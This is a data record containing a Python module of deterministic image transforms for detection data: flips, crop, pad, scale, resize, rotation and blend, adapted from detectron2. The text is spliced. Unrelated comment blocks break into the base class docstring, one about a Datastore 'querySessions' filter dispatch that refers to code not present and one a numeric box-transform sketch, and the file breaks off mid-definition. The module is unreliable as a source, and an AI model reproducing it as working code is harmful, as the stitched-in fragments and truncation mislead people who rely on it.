{"seq_id":"71586122721","text":"# adapted from https://github.com/facebookresearch/detectron2/blob/master/detectron2/data/transforms/transform.py\n\nimport inspect\nimport pprint\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, List, Optional, TypeVar\n\nimport numpy as np\nfrom PIL import Image\nimport torch\nimport torch.nn.functional as F\n\nfrom .transform_utils import to_float_tensor, to_numpy\n\ntry:\n    import cv2  # noqa\nexcept ImportError:\n    # OpenCV is an optional dependency at the moment\n    pass\n\n\n__all__ = [\n    \"BlendTransform\",\n    \"CropTransform\",\n    \"PadTransform\",\n    \"GridSampleTransform\",\n    \"HFlipTransform\",\n    \"VFlipTransform\",\n    \"NoOpTransform\",\n    \"ScaleTransform\",\n    \"Transform\",\n    \"TransformList\",\n    \"ExtentTransform\",\n    \"ResizeTransform\",\n    \"RotationTransform\"\n]\n\n\nclass Transform(metaclass=ABCMeta):\n    \"\"\"\n    Base class for implementations of **deterministic** transformations for\n    image and other data structures. \"Deterministic\" requires that the output\n    of all methods of this class are deterministic w.r.t their input arguments.\n    Note that this is different from (random) data augmentations. 
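# The if/elif chain in querySessions above dispatches on the operator name by
# hand because Datastore allows only one inequality-filtered property per
# query, so the startTime comparison has to run in Python. A table-driven
# sketch of the same dispatch (names are illustrative):
import operator

TIME_OPS = {"EQ": operator.eq, "GT": operator.gt, "GTEQ": operator.ge,
            "LT": operator.lt, "LTEQ": operator.le, "NE": operator.ne}

def filter_by_start_time(sessions, op_name, filter_time):
    cmp = TIME_OPS[op_name]
    return [s for s in sessions if s.startTime and cmp(s.startTime, filter_time)]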
To perform\n    data augmentations in training, there should be a higher-level policy that\n    generates these transform ops.\n\n    Each transform op may handle several data types, e.g.: image, coordinates,\n    segmentation, bounding boxes, with its ``apply_*`` methods. Some of\n    them have a default implementation, but can be overwritten if the default\n    isn't appropriate. See documentation of each pre-defined ``apply_*`` methods\n    for details. Note that the implementation of these methods may choose to\n    modify its input data in-place for efficient transformation.\n\n    The class can be extended to support arbitrary new data types with its\n    :meth:`register_type` method.\n    \"\"\"\n\n    def _set_attributes(self, params: Optional[List[Any]] = None) -> None:\n        \"\"\"\n        Set attributes from the input list of parameters.\n\n        Args:\n            params (list): list of parameters.\n        \"\"\"\n\n        if params:\n            for k, v in params.items():\n                if k != \"self\" and not k.startswith(\"_\"):\n                    setattr(self, k, v)\n\n    @abstractmethod\n    def apply_image(self, img: np.ndarray):\n        \"\"\"\n        Apply the transform on an image.\n\n        Args:\n            img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n                of type uint8 in range [0, 255], or floating point in range\n                [0, 1] or [0, 255].\n        Returns:\n            ndarray: image after apply the transformation.\n        \"\"\"\n\n    @abstractmethod\n    def apply_coords(self, coords: np.ndarray):\n        \"\"\"\n        Apply the transform on coordinates.\n\n        Args:\n            coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n        Returns:\n            ndarray: coordinates after apply the transformation.\n\n        Note:\n            The coordinates are not pixel indices. Coordinates inside an image of\n            shape (H, W) are in range [0, W] or [0, H].\n            This function should correctly transform coordinates outside the image as well.\n        \"\"\"\n\n    def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Apply the transform on a full-image segmentation.\n        By default will just perform \"apply_image\".\n\n        Args:\n            segmentation (ndarray): of shape HxW. The array should have integer\n                or bool dtype.\n\n        Returns:\n            ndarray: segmentation after apply the transformation.\n        \"\"\"\n        return self.apply_image(segmentation)\n\n    def apply_box(self, box: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Apply the transform on an axis-aligned box. By default will transform\n        the corner points and use their minimum/maximum to create a new\n        axis-aligned box. Note that this default may change the size of your\n        box, e.g. after rotations.\n\n        Args:\n            box (ndarray): Nx4 floating point array of XYXY format in absolute\n                coordinates.\n        Returns:\n            ndarray: box after apply the transformation.\n\n        Note:\n            The coordinates are not pixel indices. Coordinates inside an image of\n            shape (H, W) are in range [0, W] or [0, H].\n\n            This function does not clip boxes to force them inside the image.\n            It is up to the application that uses the boxes to decide.\n        \"\"\"\n        # Indexes of converting (x0, y0, x1, y1) box into 4 coordinates of\n        # ([x0, y0], [x1, y0], [x0, y1], [x1, y1]).\n        idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()\n        coords = np.asarray(box).reshape(-1, 4)[:, idxs].reshape(-1, 2)\n        coords = self.apply_coords(coords).reshape((-1, 4, 2))\n        minxy = coords.min(axis=1)\n        maxxy = coords.max(axis=1)\n        trans_boxes = np.concatenate((minxy, maxxy), axis=1)\n        return trans_boxes\n\n    def apply_polygons(self, polygons: list) -> list:\n        \"\"\"\n        Apply the transform on a list of polygons, each represented by a Nx2\n        array. 
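# Numeric sketch of apply_box's corner expansion (values made up): an XYXY box
# is expanded to its four corners, the corners are transformed, and the new
# axis-aligned box is taken as their per-box min/max.
import numpy as np

box = np.array([[10.0, 20.0, 30.0, 40.0]])                   # one XYXY box
idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()
coords = box[:, idxs].reshape(-1, 2)       # [[10,20],[30,20],[10,40],[30,40]]
coords[:, 0] = 640 - coords[:, 0]          # e.g. an HFlip with width=640
coords = coords.reshape(-1, 4, 2)
new_box = np.concatenate((coords.min(axis=1), coords.max(axis=1)), axis=1)
# new_box -> [[610., 20., 630., 40.]]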
By default will just transform all the points.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n list[ndarray]: polygon after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n return [self.apply_coords(p) for p in polygons]\n\n @classmethod\n def register_type(cls, data_type: str, func: Optional[Callable] = None):\n \"\"\"\n Register the given function as a handler that this transform will use\n for a specific data type.\n\n Args:\n data_type (str): the name of the data type (e.g., box)\n func (callable): takes a transform and a data, returns the\n transformed data.\n\n Examples:\n\n .. code-block:: python\n\n # call it directly\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n HFlipTransform.register_type(\"voxel\", func)\n\n # or, use it as a decorator\n @HFlipTransform.register_type(\"voxel\")\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n\n # ...\n transform = HFlipTransform(...)\n transform.apply_voxel(voxel_data) # func will be called\n \"\"\"\n if func is None: # the decorator style\n\n def wrapper(decorated_func):\n assert decorated_func is not None\n cls.register_type(data_type, decorated_func)\n return decorated_func\n\n return wrapper\n\n assert callable(\n func\n ), \"You can only register a callable to a Transform. Got {} instead.\".format(\n func\n )\n argspec = inspect.getfullargspec(func)\n assert len(argspec.args) == 2, (\n \"You can only register a function that takes two positional \"\n \"arguments to a Transform! Got a function with spec {}\".format(str(argspec))\n )\n setattr(cls, \"apply_\" + data_type, func)\n\n def inverse(self) -> \"Transform\":\n \"\"\"\n Create a transform that inverts the geometric changes (i.e. change of\n coordinates) of this transform.\n\n Note that the inverse is meant for geometric changes only.\n The inverse of photometric transforms that do not change coordinates\n is defined to be a no-op, even if they may be invertible.\n\n Returns:\n Transform:\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n \"\"\"\n Produce something like:\n \"MyTransform(field1={self.field1}, field2={self.field2})\"\n \"\"\"\n try:\n sig = inspect.signature(self.__init__)\n classname = type(self).__name__\n argstr = []\n for name, param in sig.parameters.items():\n assert (\n param.kind != param.VAR_POSITIONAL\n and param.kind != param.VAR_KEYWORD\n ), \"The default __repr__ doesn't support *args or **kwargs\"\n assert hasattr(self, name), (\n \"Attribute {} not found! 
\"\n \"Default __repr__ only works if attributes match the constructor.\".format(\n name\n )\n )\n attr = getattr(self, name)\n default = param.default\n if default is attr:\n continue\n attr_str = pprint.pformat(attr)\n if \"\\n\" in attr_str:\n # don't show it if pformat decides to use >1 lines\n attr_str = \"...\"\n argstr.append(\"{}={}\".format(name, attr_str))\n return \"{}({})\".format(classname, \", \".join(argstr))\n except AssertionError:\n return super().__repr__()\n\n\n_T = TypeVar(\"_T\")\n\n\n# pyre-ignore-all-errors\nclass TransformList(Transform):\n \"\"\"\n Maintain a list of transform operations which will be applied in sequence.\n Attributes:\n transforms (list[Transform])\n \"\"\"\n\n def __init__(self, transforms: List[Transform]):\n \"\"\"\n Args:\n transforms (list[Transform]): list of transforms to perform.\n \"\"\"\n super().__init__()\n # \"Flatten\" the list so that TransformList do not recursively contain TransfomList.\n # The additional hierarchy does not change semantic of the class, but cause extra\n # complexities in e.g, telling whether a TransformList contains certain Transform\n tfms_flatten = []\n for t in transforms:\n assert isinstance(\n t, Transform\n ), f\"TransformList requires a list of Transform. Got type {type(t)}!\"\n if isinstance(t, TransformList):\n tfms_flatten.extend(t.transforms)\n else:\n tfms_flatten.append(t)\n self.transforms = tfms_flatten\n\n def _apply(self, x: _T, meth: str) -> _T:\n \"\"\"\n Apply the transforms on the input.\n Args:\n x: input to apply the transform operations.\n meth (str): meth.\n Returns:\n x: after apply the transformation.\n \"\"\"\n for t in self.transforms:\n x = getattr(t, meth)(x)\n return x\n\n def __getattribute__(self, name: str):\n # use __getattribute__ to win priority over any registered dtypes\n if name.startswith(\"apply_\"):\n return lambda x: self._apply(x, name)\n return super().__getattribute__(name)\n\n def __add__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n return TransformList(self.transforms + others)\n\n def __iadd__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n self.transforms.extend(others)\n return self\n\n def __radd__(self, other: \"TransformList\") -> \"TransformList\":\n \"\"\"\n Args:\n other (TransformList): transformation to add.\n Returns:\n TransformList: list of transforms.\n \"\"\"\n others = other.transforms if isinstance(other, TransformList) else [other]\n return TransformList(others + self.transforms)\n\n def __len__(self) -> int:\n \"\"\"\n Returns:\n Number of transforms contained in the TransformList.\n \"\"\"\n return len(self.transforms)\n\n def __getitem__(self, idx) -> Transform:\n return self.transforms[idx]\n\n def inverse(self) -> \"TransformList\":\n \"\"\"\n Invert each transform in reversed order.\n \"\"\"\n return TransformList([x.inverse() for x in self.transforms[::-1]])\n\n def __repr__(self) -> str:\n msgs = [str(t) for t in self.transforms]\n return \"TransformList[{}]\".format(\", \".join(msgs))\n\n __str__ = __repr__\n\n # The actual implementations are provided in __getattribute__.\n # But abstract methods need to be declared here.\n 
def apply_coords(self, x):\n raise NotImplementedError\n\n def apply_image(self, x):\n raise NotImplementedError\n\n\nclass HFlipTransform(Transform):\n \"\"\"\n Perform horizontal flip.\n \"\"\"\n\n def __init__(self, width: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n # NOTE: opencv would be faster:\n # https://github.com/pytorch/pytorch/issues/16424#issuecomment-580695672\n if img.ndim <= 3: # HxW, HxWxC\n return np.flip(img, axis=1)\n else:\n return np.flip(img, axis=-2)\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 0] = self.width - coords[:, 0]\n return coords\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is to flip again\n \"\"\"\n return self\n\n\nclass VFlipTransform(Transform):\n \"\"\"\n Perform vertical flip.\n \"\"\"\n\n def __init__(self, height: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img))\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-2))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-3))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 1] = self.height - coords[:, 1]\n return coords\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is to flip again\n \"\"\"\n return self\n\n\nclass NoOpTransform(Transform):\n \"\"\"\n A transform that does nothing.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n def inverse(self) -> Transform:\n return self\n\n def __getattr__(self, name: str):\n if name.startswith(\"apply_\"):\n return lambda x: x\n raise AttributeError(\"NoOpTransform object has no attribute {}\".format(name))\n\n\nclass ScaleTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h: int, w: int, new_h: int, new_w: int, interp: str = None):\n \"\"\"\n Args:\n h, w (int): original image size.\n new_h, new_w (int): new image size.\n interp (str): interpolation methods. 
Options include `nearest`, `linear`\n                (3D-only), `bilinear`, `bicubic` (4D-only), and `area`.\n                Details can be found in:\n                https://pytorch.org/docs/stable/nn.functional.html\n        \"\"\"\n        super().__init__()\n        self._set_attributes(locals())\n\n    def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n        \"\"\"\n        Resize the image(s).\n\n        Args:\n            img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n                of type uint8 in range [0, 255], or floating point in range\n                [0, 1] or [0, 255].\n            interp (str): interpolation methods. Options include `nearest`, `linear`\n                (3D-only), `bilinear`, `bicubic` (4D-only), and `area`.\n                Details can be found in:\n                https://pytorch.org/docs/stable/nn.functional.html\n\n        Returns:\n            ndarray: resized image(s).\n        \"\"\"\n        if len(img.shape) == 4:\n            h, w = img.shape[1:3]\n        elif len(img.shape) in (2, 3):\n            h, w = img.shape[:2]\n        else:\n            raise ValueError(\"Unsupported input with shape of {}\".format(img.shape))\n        assert (\n            self.h == h and self.w == w\n        ), \"Input size mismatch h w {}:{} -> {}:{}\".format(self.h, self.w, h, w)\n        interp_method = interp if interp is not None else self.interp\n        # Option of align_corners is only supported for linear, bilinear,\n        # and bicubic.\n        if interp_method in [\"linear\", \"bilinear\", \"bicubic\"]:\n            align_corners = False\n        else:\n            align_corners = None\n\n        # note: this is quite slow for int8 images because torch does not\n        # support it https://github.com/pytorch/pytorch/issues/5580\n        float_tensor = torch.nn.functional.interpolate(\n            to_float_tensor(img),\n            size=(self.new_h, self.new_w),\n            mode=interp_method,\n            align_corners=align_corners,\n        )\n        return to_numpy(float_tensor, img.shape, img.dtype)\n\n    def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Compute the coordinates after resize.\n\n        Args:\n            coords (ndarray): floating point array of shape Nx2. Each row is\n                (x, y).\n        Returns:\n            ndarray: resized coordinates.\n        \"\"\"\n        coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n        coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n        return coords\n\n    def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n        \"\"\"\n        Apply resize on the full-image segmentation.\n\n        Args:\n            segmentation (ndarray): of shape HxW. The array should have integer\n                or bool dtype.\n        Returns:\n            ndarray: resized segmentation.\n        \"\"\"\n        segmentation = self.apply_image(segmentation, interp=\"nearest\")\n        return segmentation\n\n    def inverse(self) -> Transform:\n        \"\"\"\n        The inverse is to resize it back.\n        \"\"\"\n        return ScaleTransform(self.new_h, self.new_w, self.h, self.w, self.interp)\n\n\nclass GridSampleTransform(Transform):\n    def __init__(self, grid: np.ndarray, interp: str):\n        \"\"\"\n        Args:\n            grid (ndarray): grid has x and y input pixel locations which are\n                used to compute output. Grid has values in the range of [-1, 1],\n                which is normalized by the input height and width. The dimension\n                is `N x H x W x 2`.\n            interp (str): interpolation methods. Options include `nearest` and\n                `bilinear`.\n        \"\"\"\n        super().__init__()\n        self._set_attributes(locals())\n\n    def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n        \"\"\"\n        Apply grid sampling on the image(s).\n\n        Args:\n            img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n                of type uint8 in range [0, 255], or floating point in range\n                [0, 1] or [0, 255].\n            interp (str): interpolation methods. 
Options include `nearest` and\n `bilinear`.\n Returns:\n ndarray: grid sampled image(s).\n \"\"\"\n interp_method = interp if interp is not None else self.interp\n float_tensor = torch.nn.functional.grid_sample(\n to_float_tensor(img), # NxHxWxC -> NxCxHxW.\n torch.from_numpy(self.grid),\n mode=interp_method,\n padding_mode=\"border\",\n align_corners=False,\n )\n return to_numpy(float_tensor, img.shape, img.dtype)\n\n def apply_coords(self, coords: np.ndarray):\n \"\"\"\n Not supported.\n \"\"\"\n raise NotImplementedError()\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply grid sampling on the full-image segmentation.\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n Returns:\n ndarray: grid sampled segmentation.\n \"\"\"\n segmentation = self.apply_image(segmentation, interp=\"nearest\")\n return segmentation\n\n\nclass CropTransform(Transform):\n def __init__(\n self,\n x0: int,\n y0: int,\n w: int,\n h: int,\n orig_w: Optional[int] = None,\n orig_h: Optional[int] = None,\n ):\n \"\"\"\n Args:\n x0, y0, w, h (int): crop the image(s) by img[y0:y0+h, x0:x0+w].\n orig_w, orig_h (int): optional, the original width and height\n before cropping. Needed to make this transform invertible.\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Crop the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n Returns:\n ndarray: cropped image(s).\n \"\"\"\n if len(img.shape) <= 3:\n return img[self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w]\n else:\n return img[..., self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w, :]\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply crop transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: cropped coordinates.\n \"\"\"\n coords[:, 0] -= self.x0\n coords[:, 1] -= self.y0\n return coords\n\n def apply_polygons(self, polygons: list) -> list:\n \"\"\"\n Apply crop transform on a list of polygons, each represented by a Nx2 array.\n It will crop the polygon with the box, therefore the number of points in the\n polygon might change.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n ndarray: cropped polygons.\n \"\"\"\n import shapely.geometry as geometry\n\n # Create a window that will be used to crop\n crop_box = geometry.box(\n self.x0, self.y0, self.x0 + self.w, self.y0 + self.h\n ).buffer(0.0)\n\n cropped_polygons = []\n\n for polygon in polygons:\n polygon = geometry.Polygon(polygon).buffer(0.0)\n # polygon must be valid to perform intersection.\n if not polygon.is_valid:\n continue\n cropped = polygon.intersection(crop_box)\n if cropped.is_empty:\n continue\n if not isinstance(cropped, geometry.collection.BaseMultipartGeometry):\n cropped = [cropped]\n # one polygon may be cropped to multiple ones\n for poly in cropped:\n # It could produce lower dimensional objects like lines or\n # points, which we want to ignore\n if not isinstance(poly, geometry.Polygon) or not poly.is_valid:\n continue\n coords = np.asarray(poly.exterior.coords)\n # NOTE This process will produce an extra identical vertex at\n # the end. So we remove it. 
This is tested by\n # `tests/test_data_transform.py`\n cropped_polygons.append(coords[:-1])\n return [self.apply_coords(p) for p in cropped_polygons]\n\n def inverse(self) -> Transform:\n assert (\n self.orig_w is not None and self.orig_h is not None\n ), \"orig_w, orig_h are required for CropTransform to be invertible!\"\n pad_x1 = self.orig_w - self.x0 - self.w\n pad_y1 = self.orig_h - self.y0 - self.h\n return PadTransform(\n self.x0, self.y0, pad_x1, pad_y1, orig_w=self.w, orig_h=self.h\n )\n\n\nclass PadTransform(Transform):\n def __init__(\n self,\n x0: int,\n y0: int,\n x1: int,\n y1: int,\n orig_w: Optional[int] = None,\n orig_h: Optional[int] = None,\n pad_value: float = 0,\n ):\n \"\"\"\n Args:\n x0, y0: number of padded pixels on the left and top\n x1, y1: number of padded pixels on the right and bottom\n orig_w, orig_h: optional, original width and height.\n Needed to make this transform invertible.\n pad_value: the padding value\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img):\n if img.ndim == 3:\n padding = ((self.y0, self.y1), (self.x0, self.x1), (0, 0))\n else:\n padding = ((self.y0, self.y1), (self.x0, self.x1))\n return np.pad(\n img,\n padding,\n mode=\"constant\",\n constant_values=self.pad_value,\n )\n\n def apply_coords(self, coords):\n coords[:, 0] += self.x0\n coords[:, 1] += self.y0\n return coords\n\n def inverse(self) -> Transform:\n assert (\n self.orig_w is not None and self.orig_h is not None\n ), \"orig_w, orig_h are required for PadTransform to be invertible!\"\n neww = self.orig_w + self.x0 + self.x1\n newh = self.orig_h + self.y0 + self.y1\n return CropTransform(\n self.x0, self.y0, self.orig_w, self.orig_h, orig_w=neww, orig_h=newh\n )\n\n\nclass BlendTransform(Transform):\n \"\"\"\n Transforms pixel colors with PIL enhance functions.\n \"\"\"\n\n def __init__(self, src_image: np.ndarray, src_weight: float, dst_weight: float):\n \"\"\"\n Blends the input image (dst_image) with the src_image using formula:\n ``src_weight * src_image + dst_weight * dst_image``\n\n Args:\n src_image (ndarray): Input image is blended with this image\n src_weight (float): Blend weighting of src_image\n dst_weight (float): Blend weighting of dst_image\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:\n \"\"\"\n Apply blend transform on the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. 
The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n interp (str): keep this option for consistency, perform blend would not\n require interpolation.\n Returns:\n ndarray: blended image(s).\n \"\"\"\n if img.dtype == np.uint8:\n img = img.astype(np.float32)\n img = self.src_weight * self.src_image + self.dst_weight * img\n return np.clip(img, 0, 255).astype(np.uint8)\n else:\n return self.src_weight * self.src_image + self.dst_weight * img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply no transform on the coordinates.\n \"\"\"\n return coords\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply no transform on the full-image segmentation.\n \"\"\"\n return segmentation\n\n def inverse(self) -> Transform:\n \"\"\"\n The inverse is a no-op.\n \"\"\"\n return NoOpTransform()\n\n\nclass ExtentTransform(Transform):\n \"\"\"\n Extracts a subregion from the source image and scales it to the output size.\n\n The fill color is used to map pixels from the source rect that fall outside\n the source image.\n\n See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform\n \"\"\"\n\n def __init__(self, src_rect, output_size, interp=Image.LINEAR, fill=0):\n \"\"\"\n Args:\n src_rect (x0, y0, x1, y1): src coordinates\n output_size (h, w): dst image size\n interp: PIL interpolation methods\n fill: Fill color used when src_rect extends outside image\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n h, w = self.output_size\n ret = Image.fromarray(img).transform(\n size=(w, h),\n method=Image.EXTENT,\n data=self.src_rect,\n resample=interp if interp else self.interp,\n fill=self.fill,\n )\n return np.asarray(ret)\n\n def apply_coords(self, coords):\n # Transform image center from source coordinates into output coordinates\n # and then map the new origin to the corner of the output image.\n h, w = self.output_size\n x0, y0, x1, y1 = self.src_rect\n new_coords = coords.astype(np.float32)\n new_coords[:, 0] -= 0.5 * (x0 + x1)\n new_coords[:, 1] -= 0.5 * (y0 + y1)\n new_coords[:, 0] *= w / (x1 - x0)\n new_coords[:, 1] *= h / (y1 - y0)\n new_coords[:, 0] += 0.5 * w\n new_coords[:, 1] += 0.5 * h\n return new_coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n\nclass ResizeTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h, w, new_h, new_w, interp=None):\n \"\"\"\n Args:\n h, w (int): original image size\n new_h, new_w (int): new image size\n interp: PIL interpolation methods, defaults to bilinear.\n \"\"\"\n # TODO decide on PIL vs opencv\n super().__init__()\n if interp is None:\n interp = Image.BILINEAR\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n assert img.shape[:2] == (self.h, self.w)\n assert len(img.shape) <= 4\n\n if img.dtype == np.uint8:\n pil_image = Image.fromarray(img)\n interp_method = interp if interp is not None else self.interp\n pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)\n ret = np.asarray(pil_image)\n else:\n # PIL only supports uint8\n img = torch.from_numpy(img)\n shape = list(img.shape)\n shape_4d = shape[:2] + [1] * (4 - len(shape)) + shape[2:]\n img = img.view(shape_4d).permute(2, 3, 0, 1) # hw(c) -> nchw\n _PIL_RESIZE_TO_INTERPOLATE_MODE = {Image.BILINEAR: \"bilinear\", 
Image.BICUBIC: \"bicubic\"}\n mode = _PIL_RESIZE_TO_INTERPOLATE_MODE[self.interp]\n img = F.interpolate(img, (self.new_h, self.new_w), mode=mode, align_corners=False)\n shape[:2] = (self.new_h, self.new_w)\n ret = img.permute(2, 3, 0, 1).view(shape).numpy() # nchw -> hw(c)\n\n return ret\n\n def apply_coords(self, coords):\n coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n return coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n def inverse(self):\n return ResizeTransform(self.new_h, self.new_w, self.h, self.w, self.interp)\n\n\nclass RotationTransform(Transform):\n \"\"\"\n This method returns a copy of this image, rotated the given\n number of degrees counter clockwise around its center.\n \"\"\"\n\n def __init__(self, h, w, angle, expand=True, center=None, interp=None):\n \"\"\"\n Args:\n h, w (int): original image size\n angle (float): degrees for rotation\n expand (bool): choose if the image should be resized to fit the whole\n rotated image (default), or simply cropped\n center (tuple (width, height)): coordinates of the rotation center\n if left to None, the center will be fit to the center of each image\n center has no effect if expand=True because it only affects shifting\n interp: cv2 interpolation method, default cv2.INTER_LINEAR\n \"\"\"\n super().__init__()\n image_center = np.array((w / 2, h / 2))\n if center is None:\n center = image_center\n if interp is None:\n interp = cv2.INTER_LINEAR\n abs_cos, abs_sin = (abs(np.cos(np.deg2rad(angle))), abs(np.sin(np.deg2rad(angle))))\n if expand:\n # find the new width and height bounds\n bound_w, bound_h = np.rint(\n [h * abs_sin + w * abs_cos, h * abs_cos + w * abs_sin]\n ).astype(int)\n else:\n bound_w, bound_h = w, h\n\n self._set_attributes(locals())\n self.rm_coords = self.create_rotation_matrix()\n # Needed because of this problem https://github.com/opencv/opencv/issues/11784\n self.rm_image = self.create_rotation_matrix(offset=-0.5)\n\n def apply_image(self, img, interp=None):\n \"\"\"\n img should be a numpy array, formatted as Height * Width * Nchannels\n \"\"\"\n if len(img) == 0 or self.angle % 360 == 0:\n return img\n assert img.shape[:2] == (self.h, self.w)\n interp = interp if interp is not None else self.interp\n return cv2.warpAffine(img, self.rm_image, (self.bound_w, self.bound_h), flags=interp)\n\n def apply_coords(self, coords):\n \"\"\"\n coords should be a N * 2 array-like, containing N couples of (x, y) points\n \"\"\"\n coords = np.asarray(coords, dtype=float)\n if len(coords) == 0 or self.angle % 360 == 0:\n return coords\n return cv2.transform(coords[:, np.newaxis, :], self.rm_coords)[:, 0, :]\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=cv2.INTER_NEAREST)\n return segmentation\n\n def create_rotation_matrix(self, offset=0):\n center = (self.center[0] + offset, self.center[1] + offset)\n rm = cv2.getRotationMatrix2D(tuple(center), self.angle, 1)\n if self.expand:\n # Find the coordinates of the center of rotation in the new image\n # The only point for which we know the future coordinates is the center of the image\n rot_im_center = cv2.transform(self.image_center[None, None, :] + offset, rm)[0, 0, :]\n new_center = np.array([self.bound_w / 2, self.bound_h / 2]) + offset - rot_im_center\n # shift the rotation center to the new coordinates\n rm[:, 2] += new_center\n return rm\n\n def 
